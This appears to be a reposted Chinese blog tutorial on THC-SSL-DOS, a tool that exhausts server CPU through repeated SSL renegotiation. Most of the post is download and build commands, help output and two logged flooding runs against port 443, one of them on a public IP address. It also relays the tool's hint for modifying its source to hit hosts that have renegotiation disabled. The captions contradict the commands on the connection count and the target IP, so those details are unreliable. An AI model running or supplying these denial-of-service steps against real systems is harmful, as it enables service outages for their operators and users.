您的位置:首页 > 其它

SSLDOS攻击神器---THC-SSL-DOS 使用笔记

2016-06-18 09:03 1681 查看

0x00前言

德国黑客组织“The Hacker’s Choice”发布了工具THC SSL DOS,与传统DDoS工具不同的是,只需要一台执行单一攻击的电脑就能迅速消耗服务器资源,造成服务器拒绝服务。 这个攻击方式的本质是消耗服务器的CPU资源,在协商加密算法的时候服务器CPU的开销是客户端的 15 倍左右。而Renegotiating机制让攻击者可以在一个TCP连接中不停的快速重新协商,如果建立多个连接则服务端的压力更为可怕,而且这种攻击建立的连接数很少导致难以被察觉。从漏洞形成原因中,我们看到
Renegotiating机制可以让攻击者在一个TCP连接中不停的快速重新协商,由此可知,我们可以通过禁用Renegotiating机制来实现延缓此类拒绝攻击。但是其只能相对延缓,仍然不能彻底解决问题。如果通过客户端模拟多次请求连接,则依然会出现服务器端消耗资源过大的情况。由于德国黑客组织提供的工具THC SSL DOS目前只针对Renegotiations Enabled的情况.


0x01 下载安装

wget http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4.tar.gz
tar xf thc-ssl-dos-1.4.tar.gz

cd thc-ssl-dos-1.4

./configure && make

使用帮助

root@kali:~# thc-ssl-dos -h

______________ ___ _________

\__ ___/ | \ \_ ___ \

| | / ~ \/ \ \/

| | \ Y /\ \____

|____| \___|_ / \______ /

\/ \/
http://www.thc.org
Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>

-h help

-l <n> Limit parallel connections [default: 400]

0x02 使用示例

使用100 连接(-l 100), 对目标IP(192.168.1.208)及其端口(443)进行泛洪攻击。

root@kali:~# thc-ssl-dos -l 500 192.168.1.208 443 --accept

\__ ___/ | \ \_ ___ \

| | / ~ \/ \ \/

| | \ Y /\ \____

|____| \___|_ / \______ /

\/ \/
http://www.thc.org
Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................

The force is with those who read the source...

Handshakes 0 [0.00 h/s], 1 Conn, 0 Err

Handshakes 2 [2.90 h/s], 6 Conn, 0 Err

Handshakes 25 [22.42 h/s], 13 Conn, 0 Err

Handshakes 70 [43.97 h/s], 20 Conn, 0 Err

Handshakes 125 [56.51 h/s], 27 Conn, 0 Err

Handshakes 185 [62.09 h/s], 33 Conn, 0 Err

Handshakes 262 [74.56 h/s], 41 Conn, 0 Err

Handshakes 365 [104.93 h/s], 47 Conn, 0 Err

Handshakes 496 [131.23 h/s], 54 Conn, 0 Err

使用100 连接(-l 100), 对目标IP(111.13.101.208)及其端口(443)进行泛洪攻击。

root@kali:~# thc-ssl-dos -l 500 183.222.100.112 443 --accept

______________ ___ _________

\__ ___/ | \ \_ ___ \

| | / ~ \/ \ \/

| | \ Y /\ \____

|____| \___|_ / \______ /

\/ \/
http://www.thc.org
Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................

The force is with those who read the source...

Handshakes 0 [0.00 h/s], 1 Conn, 0 Err

ERROR: Target has disabled renegotiations.

Use your own skills to modify the source to test/attack

the target [hint: TCP reconnect for every handshake].

欢迎大家分享更好的思路,热切期待^^_^^ !!!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: